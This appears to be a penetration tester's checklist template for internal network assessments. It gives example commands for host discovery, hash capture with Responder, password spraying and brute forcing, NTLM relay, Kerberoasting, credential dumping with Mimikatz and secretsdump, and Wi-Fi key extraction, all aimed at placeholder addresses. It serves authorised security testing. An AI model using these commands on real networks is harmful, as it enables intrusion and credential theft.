Internal Infrastructure Logfile

Test Details & Scope

Paste any scope or exclusion details here.

Test Accounts

Include any accounts created here for mop-up!

user1:password1
admin1:password1

Legend

* : confirmed vulnerability
+ : no issue or false positive
! : warnings about issues or possible vulnerabilities
? : still needs checking

1. Pre-Flight Checks

Verify the test scope and any exclusions.
Review all related emails and previous reports.
Confirm the target network ranges.

Network Discovery

Tools & Example Commands

netdiscover:
Discover live hosts on a given network range.
```
netdiscover -r 192.168.1.0/24
```
nmap (Ping Scan):
Identify active hosts.
```
nmap -sn 192.168.1.0/24
```
Masscan (for Port 445):
Quickly scan for hosts with SMB port open.
```
masscan -p445 192.168.1.0/24 --rate=1000
```

Service Enumeration & Traffic Monitoring

Tools & Example Commands

Responder:
Capture NTLM hashes and cleartext credentials on the network.
```
responder -I eth0 -rdw
```
Wireshark:
Launch Wireshark to monitor network traffic and analyze protocols.
(No command-line; open the application and select the correct interface.)

Port Scanning with nmap:
Scan for open ports with varying intensity.

Top 10 TCP ports:
```
  nmap -p1-10 192.168.1.0/24
  
```
Top 10 UDP ports:
```
  nmap -sU -p1-10 192.168.1.0/24
  
```
Top 100 TCP ports:
```
  nmap -p1-100 192.168.1.0/24
  
```
Top 1000 TCP ports:
```
  nmap -p1-1000 192.168.1.0/24
  
```
Top 10000 TCP ports:
```
  nmap -p1-10000 192.168.1.0/24
```

4. Device Identification & Service Probing

Tools & Example Commands

Eyewitness:
Identify web servers and capture screenshots.
```
eyewitness -f targets.txt -d eyewitness_output
```
SNMP Scanning (onesixtyone):
Discover SNMP-enabled devices.
```
onesixtyone -c communities.txt 192.168.1.0/24
```

SMBMap:
Enumerate SMB shares on a target.

smbmap -H 192.168.1.100 -u username -p password

MS17-010 Vulnerability Check (nmap script):
Check for EternalBlue vulnerability.
```
nmap --script smb-vuln-ms17-010 -p445 192.168.1.100
```
Anonymous FTP Login:
Test for anonymous access.
```
ftp 192.168.1.100
```
Printer Discovery:
Manually or via SNMP tools, check for printers with open IPs.

5. Domain & User Enumeration

Tools & Example Commands

rpcclient:
Enumerate domain users.
```
rpcclient -U "" 192.168.1.100
```
At the rpcclient prompt, run:
```
enumdomusers
```

smb_login:
Attempt SMB login for password spraying.

smblogin -w DOMAIN -U user%password 192.168.1.100

Cracking Domain User Accounts (Hydra example for FTP):

hydra -L users.txt -P passwords.txt 192.168.1.100 ftp

6. Attack Preparation & Exploitation

Tools & Example Commands

ms17masscan.py:
Scan for MS17-010 vulnerable hosts.
```
python ms17masscan.py 192.168.1.0/24 445
```
Hashcat for NTLM Hashes:
Crack captured NTLM hashes.
```
hashcat -m 1000 hashes.txt wordlist.txt
```

NTLMRelay.py:
Relay captured hashes to an SMB target.

ntlmrelayx.py -t smb://192.168.1.100 -tf targets.txt

psexec:
Execute commands remotely using valid credentials.
```
psexec.py DOMAIN/user:password@192.168.1.100
```

Kerberoasting (PowerShell example):

Invoke-Kerberoast -OutputFormat Hashcat

7. Lateral Movement & Post-Exploitation

Tools & Example Commands

Bloodhound:
Gather AD relationship data.

bloodhound-python -d domain.local -u user -p password -ns 192.168.1.100

Local Exploitation & Token Impersonation (Mimikatz):

mimikatz # privilege::debug  
mimikatz # sekurlsa::logonpasswords

Additional SMB Enumeration (SMBMap):

smbmap -H 192.168.1.100 -u user -p password

Re-run Domain Enumeration (rpcclient):
```
rpcclient -U "" 192.168.1.100
```

8. Wireless & Offline Attacks

Tools & Example Commands

Retrieve WIFI Passwords (Windows):
List wireless profiles and view key details.

netsh wlan show profiles  
netsh wlan show profile name="ProfileName" key=clear

Dumping Domain Controller Hashes (secretsdump.py):
Extract NTLM hashes for offline cracking.
```
secretsdump.py -just-dc-ntlm DOMAIN/user:password@192.168.1.100
```

9. Miscellaneous & Advanced Techniques

Additional Checks & Example Commands

SNMP Community Strings (onesixtyone):

onesixtyone -c communities.txt 192.168.1.0/24

VNC Service Identification:
Scan for VNC (port 5900) using nmap.
```
nmap -p 5900 192.168.1.0/24
```

RDP Session Screenshot (Eyewitness):

eyewitness -f rdp_targets.txt -d rdp_output

Netcat for Login Service Probing:
Test connectivity on Telnet (port 23) or other services.
```
nc -vz 192.168.1.100 23
```
Accessing SYSVOL on Domain Controllers:
Using smbclient to list SYSVOL contents.
```
smbclient "\\\\192.168.1.100\\SYSVOL" -U user%password
```
Then run:
```
dir
```
to search for files like groups.xml or for cpassword entries.

aex.red

Explorer

Internal Infrastructure GPT

Internal Infrastructure Logfile

Test Details & Scope

Test Accounts

Legend

1. Pre-Flight Checks

Network Discovery

Tools & Example Commands

Service Enumeration & Traffic Monitoring

Tools & Example Commands

4. Device Identification & Service Probing

Tools & Example Commands

5. Domain & User Enumeration

Tools & Example Commands

6. Attack Preparation & Exploitation

Tools & Example Commands

7. Lateral Movement & Post-Exploitation

Tools & Example Commands

8. Wireless & Offline Attacks

Tools & Example Commands

9. Miscellaneous & Advanced Techniques

Additional Checks & Example Commands

Graph View

Table of Contents